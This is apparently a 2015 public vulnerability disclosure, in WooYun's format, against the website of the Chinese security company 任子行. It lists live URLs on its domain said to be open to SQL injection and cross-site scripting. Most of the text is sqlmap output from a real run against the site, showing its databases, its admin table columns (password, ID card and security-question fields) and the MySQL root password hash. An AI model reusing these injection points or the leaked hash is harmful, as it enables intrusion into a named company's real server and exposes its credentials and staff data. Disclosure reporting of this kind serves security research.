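2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-28: The vendor has actively ignored the vulnerability; details disclosed to the public
任子行网络技术股份有限公司 (hereafter 任子行), founded in May 2000, is one of the earliest companies in China to enter the network information security field, and is committed to safeguarding network information security for state regulatory agencies, carriers, enterprises and institutions, and individuals. This friendly penetration test touches information belonging to multiple departments; I hope it is taken seriously! PS: The 任子行 official website has multiple SQL injection points and two XSS issues, and ROOT privileges can be obtained directly.
任子行 official website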
GET-based SQL injection exists at multiple points:
http://www.1218.com.cn/index.php/product?id=23
http://www.1218.com.cn/index.php/company/recruitment?location=&type=43&position=
http://www.1218.com.cn/index.php/company/recruitment?location=深圳&type=&position=
http://www.1218.com.cn/index.php/company/recruitment?location=深圳 北京&type=&position=
http://www.1218.com.cn/index.php/company/recruitment?type=&position=
http://www.1218.com.cn/index.php/company/recruitment?location=&position=
Two GET-based XSS points:
http://www.1218.com.cn/index.php/company/recruitment?location=北京&type=&position=
http://www.1218.com.cn/index.php/company/recruitment?location=深圳 北京 武汉&type=&position=
[23:14:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[23:14:55] [INFO] fetching database names
[23:14:55] [INFO] fetching number of databases
[23:14:55] [INFO] retrieved: 6
[23:15:02] [INFO] retrieved: information_schema
[23:17:18] [INFO] retrieved: m
[23:17:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
ysql
[23:18:22] [INFO] retrieved: performance_schema
[23:21:10] [INFO] retrieved: rzxwz
[23:21:55] [INFO] retrieved: surfilter
[23:23:04] [INFO] retrieved: tes
[23:23:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[23:23:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
t
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] rzxwz
[*] surfilter
[*] test
Database: rzxwz
[23 tables]
+-------------------+
| ci_addonarticle   |
| ci_admin          |
| ci_admin_role     |
| ci_archives       |
| ci_arctiny        |
| ci_arctype        |
| ci_attachment     |
| ci_channeltype    |
| ci_city           |
| ci_form           |
| ci_log            |
| ci_login_log      |
| ci_member         |
| ci_menu           |
| ci_province       |
| ci_search         |
| ci_search_keyword |
| ci_sessions       |
| ci_stepselect     |
| ci_sys_enum       |
| ci_sysconfig      |
| ci_system_node    |
| ci_table          |
+-------------------+
Database: rzxwz
Table: ci_admin
[21 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| answer        | varchar(50) |
| birthday      | varchar(10) |
| cardid        | varchar(18) |
| createTime    | int(11)     |
| email         | varchar(50) |
| group_id      | smallint(6) |
| id            | int(11)     |
| lastLoginIp   | int(11)     |
| lastLoginTime | int(11)     |
| loginCount    | int(11)     |
| mobile        | varchar(30) |
| modifyTime    | int(11)     |
| msn           | varchar(50) |
| name          | varchar(30) |
| pass          | varchar(32) |
| phone         | varchar(30) |
| posts         | varchar(50) |
| qq            | varchar(20) |
| question      | varchar(50) |
| realname      | varchar(50) |
| state         | tinyint(4)  |
+---------------+-------------+
database management system users password hashes:
[*] root [1]:
    password hash: *732B4F7C96A81D8135BDDA8B4085A2D759892DE0
[23:34:26] [INFO] Fetched data logged to text files under 'E:\Python27\sqlmap\output\www.1218.com.cn'
[*] shutting down at: 23:34:26
http://www.1218.com.cn/index.php/company/recruitment?location=%E5%8C%97%E4%BA%AC&type=&position=TEST
http://www.1218.com.cn/index.php/company/recruitment?type=&position=&location=TEST
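For a security vendor, when it comes to web security, you understand it better than I do! I'm just a newbie!
Severity: No impact, ignored by vendor
Ignored at: 2015-11-28 11:12
Vulnerability Rank: 4 (WooYun rating)
2015-11-30: Being processed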